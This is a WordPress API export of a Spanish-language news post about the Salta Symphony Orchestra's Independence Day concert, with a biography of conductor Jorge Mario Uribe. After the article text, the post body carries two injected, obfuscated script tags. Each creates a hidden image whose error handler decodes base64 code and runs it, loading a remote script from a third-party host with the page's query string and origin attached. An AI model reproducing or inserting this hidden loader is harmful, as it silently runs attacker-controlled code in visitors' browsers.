{"id":4166,"date":"2024-07-03T10:53:54","date_gmt":"2024-07-03T13:53:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4166"},"modified":"2025-08-13T23:53:25","modified_gmt":"2025-08-14T02:53:25","slug":"la-orquesta-sinfonica-de-salta-se-prepara-para-conmemorar-el-dia-de-la-independencia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4166","title":{"rendered":"La Orquesta Sinf\u00f3nica de Salta se prepara para conmemorar el D\u00eda de la Independencia"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d549942485665683375a5a75ec8f6b9c\" style=\"background-color:#63025e\"><em>Bajo la direcci\u00f3n del renombrado maestro Jorge Mario Uribe Gonz\u00e1lez, la Orquesta Sinf\u00f3nica de Salta interpretar\u00e1 un repertorio que celebra tanto la m\u00fasica nacional como la internacional.<\/em><\/h3>\n\n\n\n<p>La Orquesta Sinf\u00f3nica de Salta se presentar\u00e1 en concierto en v\u00edsperas de la conmemoraci\u00f3n de la Independencia Argentina el lunes 8 de julio a las 21 horas en el Teatro Provincial \u201cJuan Carlos Saravia\u201d.<\/p>\n\n\n\n<p>Bajo la direcci\u00f3n del renombrado maestro Jorge Mario Uribe Gonz\u00e1lez, la Orquesta Sinf\u00f3nica de Salta interpretar\u00e1 un repertorio que celebra tanto la m\u00fasica nacional como la internacional.<\/p>\n\n\n\n<p>La Orquesta presentar\u00e1 un programa comprendido por el Himno Nacional Argentino de L\u00f3pez y Planes \u2013 Parera; la Obertura Tannh\u00e4user de Wagner; Escenas Argentinas de L\u00f3pez Buchardo; y la Sinfon\u00eda Nro. 1 de Brahms<\/p>\n\n\n\n<p>Este concierto no solo celebrar\u00e1 la independencia argentina, sino que tambi\u00e9n ofrecer\u00e1 una velada musical nacional e internacional, demostrando el talento y la dedicaci\u00f3n de la Orquesta Sinf\u00f3nica de Salta.<\/p>\n\n\n\n<p>El pr\u00f3ximo lunes 8 de julio a las 21 hs en el Teatro Provincial \u201cJuan Carlos Saravia\u201d, Zuvir\u00eda 70, se presentar\u00e1 el cuerpo mayor de m\u00fasica con entrada libre y gratuita para conmemorar una de las fechas patrias m\u00e1s importantes de la Historia Argentina.<\/p>\n\n\n\n<p><strong>Sobre Jorge Mario Uribe<\/strong><\/p>\n\n\n\n<p>Actualmente el maestro Uribe ha sido recientemente nombrado como director titular de la Orquesta Sinf\u00f3nica de Salta en Argentina. Es un destacado y talentoso director de orquesta y clarinetista colombiano. Obtuvo el premio de honor del jurado en el Concurso Internacional de Direcci\u00f3n de Orquesta del Mar Negro, fue semifinalista en el Bucharest International Conducting Compe-tition y tambi\u00e9n semifinalista en el Concurso Internacional de Direcci\u00f3n de Orquesta de la Uni\u00f3n Europea, una de las m\u00e1s prestigiosas competencias del mundo la cual cont\u00f3 con m\u00e1s de 300 competidores de los 5 continentes.<\/p>\n\n\n\n<p>En el 2018 fue invitado a dirigir el concierto de apertura del trig\u00e9simo Festival del Carpineto Romano en Italia en un claustro del 1600 al frente de la Orquesta Filarm\u00f3nica de la ciudad de Latina (Latina Philarmonia). Ha sido director invitado en la Orquesta Sinf\u00f3nica Eafit de Medell\u00edn, la Orquesta Sinf\u00f3nica de Salta en Argentina, la banda sinf\u00f3nica de la Universidad distrital de Bogot\u00e1 y por 12 a\u00f1os trabaj\u00f3 como director asociado en la Orquesta Filarm\u00f3nica de Cali, Colombia, al frente de la cual dirigi\u00f3 un gran n\u00famero de conciertos desarrollando un importante repertorio sinf\u00f3nico as\u00ed como una serie de proyectos especiales combinando la m\u00fasica de los grandes compositores con otras manifestaciones del arte: el concierto en homenaje a los \u201c400 a\u00f1os de la muerte de William Shakespeare\u201d y los \u201c200 a\u00f1os de Manfred de Lord Byron\u201d en cooperaci\u00f3n con el departamento de artes esc\u00e9nicas de la Universidad del Valle, o el concierto de conmemoraci\u00f3n al centenario de la muerte de Claude Debussy sobre la vida y obra del maestro y el impresionismo, donde dirigi\u00f3 y actu\u00f3 al tiempo como solista han sido algunos de estos proyectos.<\/p>\n\n\n\n<p>Ha dirigido y tocado como solista al lado de artistas ligados a las m\u00e1s importantes instituciones tales como Pittsburg Symphony Orchestra, Opera de Chicago, Grammy Awards, Harvard University, Forthworth Symphony, Copenhaguen Philharmonic, Radio Televisi\u00f3n Espa\u00f1ola, Concurso Tchaikovsky y Maggio Musicale Fiorentino entre otras.<\/p>\n\n\n\n<p>Como arreglista ha estrenado sus propios trabajos entre los que se cuentan las orquestaciones sobre 8 lieder de Franz Schubert para tenor y orquesta de c\u00e1mara, y sus arreglos \u201cDulce navidad\u201d y \u201cLa \u00e9poca Santa\u201d para tenor solista, coro y gran orquesta y Christmas Fantasy y Campanas de navidad para coro y orquesta han tenido gran \u00e9xito. Adicionalmente tiene un premio nacional en composici\u00f3n.<\/p>\n\n\n\n<p>Ha sido importante en su carrera y su formaci\u00f3n estudiar bajo la gu\u00eda particular de su profesor y mentor el clarinetista y director de orquesta italiano Francesco Belli quien a su vez estudio con Franco Ferrara y Sergiu Celibidache, as\u00ed como sus estudios en armon\u00eda y an\u00e1lisis con la profesora Svetlana Bouchtaber, Summa Cum Laude del conservatorio estatal Rimsky-Korsakov de San Petersburgo.<\/p>\n\n\n\n<p>Fue por varios a\u00f1os clarinete solista principal en la Orquesta Filarm\u00f3nica de Cali, ha participado como clarinetista principal invitado en la Orquesta Sinf\u00f3nica Nacional de Colombia y la City of London Orchestra, se destacan sus invitaciones como solista en dos ediciones del Festival Internacional de M\u00fasica Cl\u00e1sica de Cartagena, sus presentaciones en la ciudad de Nueva York y en Connecticut con la firma \u201cMusical Arts Alliance\u201d y sus presentaciones como solista en Alemania con el Ensamble D\u00b4accord. En el verano de 2021 fue invitado a tocar en la sala de c\u00e1mara Steingraeber en Bayreuth, una de las capitales europeas de la m\u00fasica cl\u00e1sica, as\u00ed como a una gira por diferentes ciudades alemanas. Ha interpretado como solista con orquesta la mayor\u00eda de los grandes conciertos del repertorio para clarinete as\u00ed como las m\u00e1s importantes piezas de m\u00fasica de c\u00e1mara.<\/p>\n\n\n\n<p>Uribe fue por cinco a\u00f1os profesor del Conservatorio Antonio Mar\u00eda Valencia de Caliy diez a\u00f1os profesor del departamento de m\u00fasica de la Universidad del Valle.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-orquesta-sinfonica-de-salta-se-prepara-para-conmemorar-el-dia-de-la-independencia-96425\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Bajo la direcci\u00f3n del renombrado maestro Jorge Mario Uribe Gonz\u00e1lez, la Orquesta Sinf\u00f3nica de Salta interpretar\u00e1 un repertorio que celebra tanto la m\u00fasica nacional como la internacional. La Orquesta Sinf\u00f3nica de Salta se presentar\u00e1 en concierto en v\u00edsperas de la conmemoraci\u00f3n de la Independencia Argentina el lunes 8 de julio a las 21 horas en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4167,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-4166","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4166"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4166"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4166\/revisions"}],"predecessor-version":[{"id":6750,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4166\/revisions\/6750"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4167"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4166"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4166"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}